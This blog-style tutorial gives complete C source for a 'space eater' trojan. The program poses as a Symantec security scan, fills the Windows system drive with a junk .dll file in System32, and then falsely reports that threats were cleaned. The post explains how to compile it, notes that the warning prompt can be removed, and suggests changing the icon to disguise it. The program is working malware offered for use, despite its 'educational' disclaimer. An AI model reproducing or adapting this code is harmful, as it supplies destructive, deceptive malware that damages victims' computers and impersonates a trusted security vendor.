How to Make a Trojan Horse

                           How to Make a Trojan Horse 


Most of you may be curious to know about how to make a Trojan or Virus on your own. Well, here is an answer to your curiosity. In this, post I’ll show you how to make a simple trojan on your own using the C programming language. This trojan when executed will eat up the hard disk space on the root drive (The drive on which the Windows is installed, usually C: Drive) of the computer on which it is run. Also, this trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. Unlike what many of us think, a trojan horse is not a virus. In simple words, it is just a program that appears to do a favorable task but in reality performs undisclosed malicious functions that allow the attacker to gain unauthorized access to the host machine or cause a damage to the computer. 

Now let’s move on to the working of our Trojan:

The trojan horse which I have created appears itself as an antivirus program that scans the computer for malware programs. However, in reality it does nothing other than eating up the hard disk space on the root drive by filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result, the the root drive gets filled up completely with in minutes of running this program.
Once the disk space is full, the trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any of the cleanup program. This is because, the trojan intelligently creates a huge file in theWindows\System32 folder with the .dll extension. Since the junk file has the.dll extension it is often ignored by the disk cleanup software. Hence there is now way to recover the hard disk space other than reformatting the drive.

The algorithm of the Trojan is as follows:

  1. Search for the root drive.
  2. Navigate to %systemroot%\Windows\System32 on the root drive.
  3. Create the file named “spceshot.dll“.
  4. Start dumping the junk data onto the above file and keep increasing its size until the drive is full.
  5. Once the drive is full, stop the process..
    Here is the code :
    /* SPACE EATER TROJAN . USE IT FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD!*/

    #include<stdio.h>
    #include<conio.h>
    #include<dos.h>
    #include<stdlib.h>
    FILE *a,*t,*b;
    int r,status,vir_count;
    double i;
    char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice;

    void eatspace(void);
    void findroot(void);
    void showstatus(void);
    void draw(void);
    void accept(void);

    void main()
    {
    draw();
    accept();
    textcolor(WHITE);
    draw();
    gotoxy(12,8);
    cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT...");
    sleep(3);
    gotoxy(12,8);
    delline();
    cputs("PRESS ANY KEY TO START THE SYSTEM SCAN...");
    getch();
    gotoxy(12,8);
    delline();
    findroot();
    }

    void accept()
    {
    textcolor(LIGHTRED);
    gotoxy(1,8);
    cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT.");

    if((choice=getch())!=13)
    exit(0);
    }

    void draw()
    {
    clrscr();
    textcolor(WHITE);
    gotoxy(12,2);
    cputs("********************************************************");
    gotoxy(12,6);
    cputs("********************************************************");
    gotoxy(12,3);
    cputs("*\n\b*\n\b*\n\b");
    gotoxy(67,3);
    cputs("*\n\b*\n\b*\n\b");
    gotoxy(14,4);
    cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)");
    }

    void findroot()
    {
    t=fopen("C:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    textcolor(WHITE);
    a=fopen("C:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("C:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("D:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("D:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("D:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("E:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("E:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("E:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    t=fopen("F:\\windows\\explorer.exe","rb");
    if(t!=NULL)
    {
    fclose(t);
    a=fopen("F:\\windows\\system32\\spceshot.dll","rb");
    if(a!=NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!");
    getch();
    exit(1);
    }
    b=fopen("F:\\windows\\system32\\spceshot.dll","wb+");
    if(b!=NULL)
    {
    showstatus();
    eatspace();
    }
    }
    if(t==NULL)
    {
    textcolor(LIGHTRED);
    gotoxy(12,8);
    cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM.");
    getch();
    exit(1);
    }
    exit(1);
    }

    void eatspace()
    {
    textcolor(LIGHTRED);
    gotoxy(12,16);
    cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n");
    textcolor(WHITE);
    gotoxy(12,18);
    while(1)
    {
    for(r=1;r<4;r++)
    {
    for(i=1;i<900000;i++)
    {
    status=fputs(ch,b);
    if(status==EOF)
    {
    textcolor(WHITE);
    vir_count=random(120);
    draw();
    gotoxy(12,8);
    cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count);
    gotoxy(12,10);
    cprintf("PRESS ANY KEY TO CLOSE...");
    getch();
    break;
    }
    }
    cputs(".");
    if(status==EOF) break;
    }
    if(status==EOF) break;
    }
    exit(0);
    }

    void showstatus()
    {
    gotoxy(12,8);
    cputs("SCANNING THE SYSTEM FOR THREATS");
    gotoxy(12,10);
    cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS");
    gotoxy(12,13);
    cputs("SCAN IN PROGRESS. PLEASE WAIT...");
    }
    Pease note that I have not included the executable for security reasons. You need to compile it to obtain the executable.

    How to compile the program?

    For step-by-step compilation guide: 
    If you’re new to C programming and find it difficult to compile the C source codesthen this post is for you.
    Here is a step-by-step procedure to install Borland C++ compiler 5.5 on your PC and compile the C programs.

    How to Install Borland C++ compiler?

    Follow the below steps to install Borland C++ compiler 5.5 on your PC:
    1. Download Borland C++ compiler 5.5 (for Windows platform) from the following link:
    2. After you download, run the file C++5.51.exe. The default installation path would be:
      C:\Borland\BCC55

    How to configure Borland C++ compiler?

    Here is a step-by-step instruction on how to configure the compiler:
    1. After you install Borland C++ compier, create two new Text Documents.
    2. Open the first New Text Document.txt file and add the following two lines into it:
      -I”c:\Borland\Bcc55\include”
      -L”c:\Borland\Bcc55\lib”
      Save changes and close the file. Now rename the file from New Text Document.txt to bcc32.cfg.
    3. Open the second New Text Document (2).txt file and add the following line into it:
      -L”c:\Borland\Bcc55\lib”
      Save changes and close the file. Rename the file from New Text Document (2).txt to ilink32.cfg.
    4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate toC:\Borland\BCC55\Bin and paste them.

    How to Compile the C Source Code (.C files)?

    Here is a detailed instruction on how to compile C source codes:
    1. You need to place the .C (example.c) file to be compiled in the following location:
    2. C:\Borland\BCC55\Bin
    3. Now go to the command prompt (Start->Run->type cmd->Enter)
    4. Make the following path as the present working directory (use the CDcommand):
    5. C:\Borland\BCC55\Bin
    6. To compile the file (example.c) use the following command:
    7. bcc32 example.c
    8. Now if there exists no error in the source code, you’ll get a compiled executable module (example.exe) in the same location (C:\Borland\BCC55\Bin).
    9. Now you have successfully compiled the source code into an executable file(.exe file).

      How to test this trojan horse?

      To test the trojan, just run the SpaceEater.exe file on your computer. It will generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up the hard disk space.
      NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.

      How to fix the damage and free up the space?

      To remove the damage and free up the space, just type the following in the “run” dialog box:
      %systemroot%\system32
      Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.
       NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file ?
      Please pass your comments and tell me your opinion. I am just waiting for your comments. :)

Post a Comment